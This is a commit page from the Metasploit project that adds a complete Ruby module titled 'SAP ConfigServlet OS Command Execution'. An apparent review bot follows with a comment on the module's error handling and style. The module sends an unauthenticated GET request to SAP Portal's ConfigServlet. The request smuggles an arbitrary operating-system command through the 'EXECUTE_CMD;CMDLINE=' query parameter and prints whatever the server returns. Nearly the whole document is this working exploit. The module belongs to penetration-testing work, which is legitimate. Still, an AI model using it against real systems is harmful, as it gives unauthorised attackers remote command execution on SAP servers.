
Commit 8c9715c

author
jvazquez-r7
committed
Land rapid7#1751, @andrewkabai's SAP Portal remote OS command exec
2 parents a09b3b8 + 79eb2ff commit 8c9715c


1 file changed

+64
-0
lines changed

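--- a/PATH_NOT_SHOWN_ON_PAGE
+++ b/PATH_NOT_SHOWN_ON_PAGE
@@ -0,0 +1,64 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+include Msf::Exploit::Remote::HttpClient
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'SAP ConfigServlet OS Command Execution',
+'Description' => %q{
+This module allows execution of operating system commands through
+the SAP ConfigServlet without any authentication.
+},
+'Author' =>
+[
+'Dmitry Chastuhin', # Vulnerability discovery (based on the reference presentation)
+'Andras Kabai' # Metasploit module
+],
+'License' => MSF_LICENSE,
+'References' =>
+[
+[ 'URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf'],
+[ 'EDB', '24963' ]
+],
+'DisclosureDate' => 'Nov 01 2012' # Based on the reference presentation
+))
+
+register_options(
+[
+Opt::RPORT(50000),
+OptString.new('CMD', [ true, 'The command to execute', 'whoami']),
+OptString.new('TARGETURI', [ true, 'Path to ConfigServlet', '/ctc/servlet'])
+], self.class)
+end
+
+def run
+begin
+print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
+uri = normalize_uri(target_uri.path, 'ConfigServlet')
+
+res = send_request_cgi(
+{
+'uri' => uri,
+'method' => 'GET',
+'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text::uri_encode(datastore['CMD'])
+})
+if !res or res.code != 200
+print_error("#{rhost}:#{rport} - Exploit failed.")
+return
+end
+rescue ::Rex::ConnectionError
+print_error("#{rhost}:#{rport} - Failed to connect to the server")
+return
+end
+
+if res.body.include?("Process created")
+print_good("#{rhost}:#{rport} - Exploited successfully\n")
+print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")
+print_line("#{rhost}:#{rport} - Output: #{res.body}")
+else
+print_error("#{rhost}:#{rport} - Exploit failed.")
+vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
+end
+end
+end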
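Review bot: In `run`, a missing response and a non-200 status share one `Exploit failed.` message (new line 46), and the same text is printed again at line 60 when the `Process created` marker is absent, so the three outcomes cannot be told apart in the console or in logs. Split the first check into `return print_error("#{rhost}:#{rport} - No response from server") unless res` followed by a non-200 branch that reports `res.code`, and write the condition with `||` rather than `or`. `Rex::Text::uri_encode` is a method call and reads better as `Rex::Text.uri_encode`. `run` would also benefit from a short comment stating that success is inferred only from the `Process created` string and that the whole response body is printed unparsed as the command output.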
